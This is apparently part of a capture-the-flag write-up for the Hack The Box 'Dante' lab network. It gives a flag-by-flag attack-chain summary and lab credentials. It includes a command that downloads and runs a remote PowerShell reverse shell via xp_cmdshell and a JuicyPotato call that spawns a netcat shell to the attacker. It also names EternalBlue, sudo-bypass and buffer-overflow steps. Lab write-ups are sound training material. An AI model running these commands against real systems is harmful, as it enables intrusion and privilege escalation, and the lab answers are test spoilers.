xp_cmdshell "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2/Invoke-PowerShellTcp.ps1');\""
# Shell as nt service\mssql$sqlexpress on DANTE-SQL01
# FLAG 31: C:\users directory
Privilege escalation via JuicyPotato:
# db_backup.ps1 reveals: $password = 'Alltheleavesarebrown1'
proxychains evil-winrm -i 172.16.1.5 -u sophie -p Alltheleavesarebrown1
# whoami /priv: SeAssignPrimaryToken present — Windows Server 2016
upload nc.exe
.\JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -a "/c c:\users\sophie\documents\nc.exe -e cmd.exe 10.10.14.2 8888" -l 1337 -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"
# nt authority\system on DANTE-SQL01
# FLAG 32: Administrator desktop
Attack Chain Summary
nmap sweep 10.10.110.0/24 → DANTE-WEB-NIX01 (10.10.110.100)
↓
FTP anon → todo.txt | robots.txt → FLAG 1
WordPress wpscan → james:Toyota → wp-admin theme editor RCE → www-data
su james → FLAG 2 | find SUID root → FLAG 3 | proxychains pivot
↓
DANTE-NIX02 (172.16.1.10): LFI → /etc/passwd | SMB null → wp-config.php
margaret:STARS5678FORTUNE401 → SSH rbash → vim escape → FLAG 4
Slack logs → frank creds | Python urllib hijack → root → FLAG 5
↓
DANTE-NIX03 (172.16.1.17): SMB pcap → Wireshark admin:Password6543
Webmin 1.900 RCE → root → FLAG 6
↓
DANTE-WS01 (172.16.1.13): Online Discussion Forum RCE → gerald → FLAG 7
Druva inSync 6.6.3 LPE → SYSTEM → FLAG 8
↓
DANTE-NIX04 (172.16.1.12): SQLi → flag (FLAG 9) + MD5 hashes
john → ben:Welcometomyblog → SSH → FLAG 10
sudo -u#-1 bypass (CVE-2019-14287) → root → FLAG 11
↓
DANTE-WS03 (172.16.1.102): Marriage Reg RCE → blake → FLAG 12
SERVER.EXE BOF (offset 1028, JMP ESP 0x10476d73) → SYSTEM → FLAG 13
↓
DANTE-DC01 (172.16.1.20): MS17-010 EternalBlue → SYSTEM
Excel creds + mrb3n flag → FLAGS 14-15
↓
DANTE-NIX05 (172.16.1.37): PHP Phar deserialization → pericles → FLAG 16
systemd timer write → root → FLAG 17
↓
DANTE-WS04 (172.16.1.45): elearning RCE (AV bypass) → leroy → FLAG 18
PSReadLine history → admin:KingOfTheMountain → RDP → FLAG 19
↓
DANTE-WS02 (172.16.1.101): FTP brute → dharding:WestminsterOrange10
IObit unquoted service path → SYSTEM → FLAGS 20-21
↓
DANTE-NIX01 (172.16.1.5): FTP anon → FLAG 22
↓
DANTE-DC02 (172.16.2.5): ASREPRoast jbercov:myspace7
BloodHound DCSync → secretsdump → Admin NTLM → PSExec PTH → SYSTEM → FLAGS 23-24
↓
DANTE-NIX07 (172.16.1.19): Jenkins Groovy RCE → ian disk group → debugfs → FLAG 26
↓
DANTE-ADMIN-NIX05 (172.16.2.101): SSH brute julian:manchesterunited → FLAG 27
readfile SUID 64-bit BOF (shellcode in env) → root → FLAG 28
↓
DANTE-ADMIN-NIX06 (172.16.2.6): SSH reuse → plongbottom:PowerfixSaturdayClub777
sudo su → root → FLAGS 29-30 | Sophie SQL creds found
↓
DANTE-SQL01 (172.16.1.5): MSSQL sysadmin → xp_cmdshell → shell
db_backup.ps1 → sophie:Alltheleavesarebrown1 → WinRM
SeAssignPrimaryToken → JuicyPotato → SYSTEM → FLAGS 31-32
ⓒ 0xNRG
Writeup restricted
This machine is currently active. The full writeup will be published once the box retires, in accordance with HTB's NDA policy.